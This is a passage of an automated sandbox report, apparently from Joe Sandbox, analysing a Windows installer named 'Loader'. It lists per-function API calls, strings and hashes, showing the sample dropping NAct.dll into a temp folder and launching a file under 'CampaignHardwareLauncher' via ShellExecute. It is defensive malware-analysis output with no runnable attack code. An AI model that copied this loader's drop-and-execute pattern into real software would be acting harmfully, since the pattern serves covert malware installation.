                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 471e7f8fc2b920915949bdd7b41082774f496188afb4edabac252d6a905c9898
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471e7f8fc2b920915949bdd7b41082774f496188afb4edabac252d6a905c9898
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                                • Opcode ID: 46c390435ded0289b51bf86199c37f5fb3dbd54544940a230ac431ba2e2bd181
                                                                                                                                                                                                                                                                                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46c390435ded0289b51bf86199c37f5fb3dbd54544940a230ac431ba2e2bd181
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                                Function 00402B23 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00402B5A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 2568930968-3145118107
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1ebce3df12df367927eba5803e4039b1c10173b09545cb528426889d817ad681
                                                                                                                                                                                                                                                                                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ebce3df12df367927eba5803e4039b1c10173b09545cb528426889d817ad681
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                                Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(05C05526,00000064,05C0552A), ref: 00403295
                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                                Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                                Function 004021B5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,?), ref: 00402202
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 004021D6
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658, xrefs: 004021EE
                                                                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                                • API String ID: 3156913733-2464696229
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4d879d2c8321bb463321977456507b10eaea5390416c5072baed3c839463aa30
                                                                                                                                                                                                                                                                                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d879d2c8321bb463321977456507b10eaea5390416c5072baed3c839463aa30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                                Function 00402713 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                                • String ID: <RM>$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$WriteINIStr: wrote [%s] %s=%s in %s$install
                                                                                                                                                                                                                                                                                                                • API String ID: 247603264-1427044805
                                                                                                                                                                                                                                                                                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
